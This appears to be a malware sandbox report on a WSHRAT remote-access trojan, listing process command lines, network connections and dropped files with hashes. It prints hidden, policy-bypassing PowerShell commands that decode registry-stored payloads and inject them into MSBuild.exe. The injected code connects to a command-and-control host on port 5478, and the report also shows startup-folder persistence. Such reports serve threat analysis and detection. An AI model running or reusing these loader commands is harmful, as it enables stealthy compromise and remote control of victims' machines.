"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'ben738sj11xz.mywire.org 5478 \"WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path ben738sj11xz.mywire.org 5478 "WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands" 1
Network
| Country | Destination | Domain | Proto |
| US | 52.109.12.18:443 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ben738sj11xz.mywire.org | udp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| DE | 23.51.123.27:80 | | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
Files
memory/3436-115-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\launcher service.js
| MD5 | 8dce2fac1cdb56ef997f0c4f8065f82e |
| SHA1 | da01f70d7035a8e8421d2296c7b481dc6dcb2b09 |
| SHA256 | 6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411 |
| SHA512 | cb622198fee5d9810e6762f82c78da1a3868b1b67061d788b1af124f6f39456de73b7ba90452098983ff32762f28d471b1c546d228a393cf7364e1babfaac6a3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js
| MD5 | 28d4b39c5ab839e66afd24b3789e28c7 |
| SHA1 | 1e13f0ff2bcfcbf04b6ed9e6225d5772a3b5bb13 |
| SHA256 | c3a8a50de9d7aa5142a35612187d9f315134420f36310b18a4da7dbf4826a0aa |
| SHA512 | 27b95b87cbe1d8b602df02a95e3ed3e7737a5adfc94d903ea95ecce501a569ef582bc370911b35c1c48ab90a93ad3fea340bf017f2e032607230b52c188be51b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8a313b70fd641fc4e6fffb40391d0b4d |
| SHA1 | 22684fe19ecd7943ac18e622db0d7f161db500e8 |
| SHA256 | bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911 |
| SHA512 | 5b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dbbeee3c97557a70459b6d579e0d23bf |
| SHA1 | 00e30dbe674d7c561da954a7059a719f864fcdde |
| SHA256 | 503b948d4073ee324fb320d16c13e589b8aee0f6c254c5c9e4c52b3d4b4d48e7 |
| SHA512 | dde59ef8c9b4e948ceab50389a8d4d4677596038c217f80270c8e8ace209e80bbe35984c9168c0040f67a78bb58c6c9ca5ebc5d242e4c1027c83bbfeffecbc09 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 98cd985d8372e4230d6f0ff9af003fd0 |
| SHA1 | d6b538603d60624cfd00404d141eab9e50025c7f |
| SHA256 | e05e0f99f07a63bd7943f876777e10e4600536aecbfc184d51c33e69a1900a32 |
| SHA512 | 56d2e322cdfdb7eae5244999faf30a4c16b95e7461cef5d0b8b2518ff06db7b6ed01c7a822b99a566126ee6265ce0c698d5d276302fcf0bd74ed8ccbab25c01e |